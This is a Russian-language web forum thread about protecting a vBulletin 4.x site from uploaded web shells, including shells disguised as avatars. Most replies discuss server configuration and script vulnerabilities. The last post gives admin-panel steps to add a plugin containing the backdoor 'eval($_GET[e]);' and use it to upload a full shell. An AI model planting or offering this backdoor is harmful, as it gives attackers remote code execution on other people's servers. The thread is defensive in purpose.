Бормотухи.НЕТ

Вернуться   Бормотухи.НЕТ > Web-мастеру > vBulletin 4.x
Расширенный поиск

vBulletin 4.x Все для скрипта форума vBulletin 4.x

Ответ
 
Опции темы Поиск в этой теме
Старый 19.03.2014, 19:16 Вверх   #1
Пользователь
 
Аватар для xsfd
xsfd вне форума
Доп. информация
По умолчанию Защита от заливки Шела

Здравствуйте. Появилась необходимость защиты сайта от заливки шелов. Я раскидал .htaccess файлы, урезал права по папкам и т.п.

Интересует именно способ заливки Шела как аватарки. Как с ним бороться и на сколько безопасно хранение аватаров в базе данных?
  Ответить с цитированием
Старый 19.03.2014, 21:31 Вверх   #2
Уважаемая личность
 
Аватар для grisha2217
grisha2217 вне форума
Доп. информация
По умолчанию

Ну так сделай хранение аватаров в файловой системе.
  Ответить с цитированием
Старый 20.03.2014, 18:23 Вверх   #3
Пользователь
 
Аватар для xsfd
xsfd вне форума
Доп. информация
По умолчанию

что на много опаснее и проще будет юзануть шелл
  Ответить с цитированием
Старый 20.03.2014, 18:27 Вверх   #4
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от xsfd Посмотреть сообщение
что на много опаснее и проще будет юзануть шелл
На бормотухе в файловой системе... что дальше то ? Если сервак криво настроен , то по барабану где будут храниться аватарки. Если скрипт с дырами стоит - по барабану где будут храниться аватарки. И так далее.
Тут нюансов очень много. У меня вообще шел в модулях был.
  Ответить с цитированием
Старый 20.03.2014, 18:51 Вверх   #5
Уважаемая личность
 
Аватар для grisha2217
grisha2217 вне форума
Доп. информация
По умолчанию

Чаще взламывают через сторонние скрипты, а не через чистый дистрибутив.
  Ответить с цитированием
Старый 20.03.2014, 20:00 Вверх   #6
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от grisha2217 Посмотреть сообщение
Чаще взламывают через сторонние скрипты, а не через чистый дистрибутив.
В случае с булкой - ее взламывают из-за дыр в скрипте (или уязвимостей, при не корректной настройки скрипта, не верных прав на папки) в 80% случаев всех произошедших взломов.
  Ответить с цитированием
Старый 20.03.2014, 20:29 Вверх   #7
Уважаемая личность
 
Аватар для grisha2217
grisha2217 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Serberg Посмотреть сообщение
В случае с булкой - ее взламывают из-за дыр в скрипте (или уязвимостей, при не корректной настройки скрипта, не верных прав на папки) в 80% случаев всех произошедших взломов.
Ну я это и имел ввиду, я подразумевал, что сторонние скрипты - это различные хаки для булки)
  Ответить с цитированием
Старый 20.03.2014, 20:47 Вверх   #8
Грамотный форумчанин
 
Аватар для dyukin
dyukin вне форума
Доп. информация
По умолчанию

шелл заливается в основнов через стили или модули
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);
потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo(); и заливаем полноценный шелл в не закрытую диру))
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 07:09. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot
 

Время генерации страницы 0.10570 секунды с 13 запросами